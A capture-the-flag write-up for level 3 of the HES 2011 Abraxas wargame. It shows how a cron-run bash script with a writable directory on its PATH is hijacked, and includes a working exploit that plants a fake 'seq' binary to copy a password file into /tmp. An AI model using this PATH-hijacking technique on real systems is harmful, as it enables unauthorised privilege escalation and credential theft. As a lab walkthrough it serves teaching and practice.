[HES 2011] Abraxas Wargame - Level 3
Hello,
Level3, here we come!
Clues from the logbook:
- “she’s currently testing with generated datasets.”
- “The entire thing is written in bash and runs as a cronjob every 10 minutes.”
We look at the cronjob to locate the script:
1
2
3
$ cat /etc/cron.d/lifesupport_process
*/10 * * * * level3 /home/level3/bin/lifesupport_process.sh &> /dev/null
We read it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cat /home/level3/bin/lifesupport_process.sh
#!/bin/bash
datadir=/opt/lifesupportdata
scriptdir=/home/level3/bin/
PATH=$datadir:.:$scriptdir:$PATH
cd $scriptdir
. common.inc.sh
# life support stats
data=$($scriptdir/lifesupport_data.sh)
echo "Orig: $data"
echo -n "Sorted: "; mysort $data
echo -n "Sum: "; sum $data
echo -n "Average: "; avg $data
echo -n "Max: "; max $data
echo -n "Min: "; min $data
echo -n "Cumulated: "; cumul $data
mmm, we can see datadir in PATH! Interesting.
Let’s look at its perms:
1
2
3
4
5
6
$ ls -lash /opt/
total 16K
4.0K drwxr-xr-x 4 root root 4.0K 2011-04-06 10:54 .
4.0K drwxr-xr-x 21 root root 4.0K 2011-09-02 14:17 ..
4.0K drwx-wx--x 2 root level2 4.0K 2013-03-06 02:17 lifesupportdata
4.0K drwxr-xr-x 6 root root 4.0K 2011-04-05 00:07 workpackagebuilder
We can write to /opt/lifesupportdata! So we can use PATH to redirect to out script. I tried with echo but no luck, so when looking at lifesupport_data.sh:
1
2
3
4
5
6
7
8
9
10
11
12
$ cat /home/level3/bin/lifesupport_data.sh
#!/bin/bash
# FIXME: There is no kernel module yet to retrieve life support data
# This script just spits out random data, so we can at least test the processing scripts
for i in `seq 1 10`;
do
echo -n $((RANDOM % 100))
echo -n " "
done
echo
seq work wonderfully, here is the exploit:
1
2
3
4
5
6
7
8
9
#!/bin/sh
cat << EOF > /opt/lifesupportdata/seq
#!/bin/sh
/bin/cat /etc/pass/level3 > /tmp/lvl3.pass
EOF
chmod a+x /opt/lifesupportdata/seq
And yes, the script run as whatever id you run it at, so you can do anything. Now, you’ve just got to wait every 10 minutes ;).
Cheers,
m_101